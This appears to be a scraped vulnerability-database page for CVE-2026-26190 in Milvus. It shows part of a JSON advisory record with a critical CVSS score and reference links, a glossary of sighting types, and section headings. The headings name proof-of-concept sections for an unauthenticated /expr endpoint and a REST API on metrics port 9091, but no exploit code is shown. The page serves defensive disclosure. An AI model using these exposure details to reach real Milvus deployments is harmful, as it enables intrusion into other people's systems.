  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/milvus-io/milvus"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.5.27"
    },
    {
      "type": "WEB",
      "url": "https://github.com/milvus-io/milvus/releases/tag/v2.6.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-26190 (GCVE-0-2026-26190)

bit-milvus-2026-26190

Vulnerability from bitnami_vulndb

FKIE_CVE-2026-26190

GHSA-7PPG-37FH-VCR6

Summary

Details

Vulnerability 1: Weak Default Authentication on /expr Endpoint

Vulnerability 2: Unauthenticated REST API on Metrics Port

Proof of Concept

PoC 1 — /expr Endpoint Exploitation

PoC 2 — Unauthenticated REST API Access

Internet Exposure

Impact

Remediation

Recommended Fixes

User Mitigations (until patched)

Credit

Tags

Sightings

Nomenclature

Vulnerability 1: Weak Default Authentication on `/expr` Endpoint

PoC 1 — `/expr` Endpoint Exploitation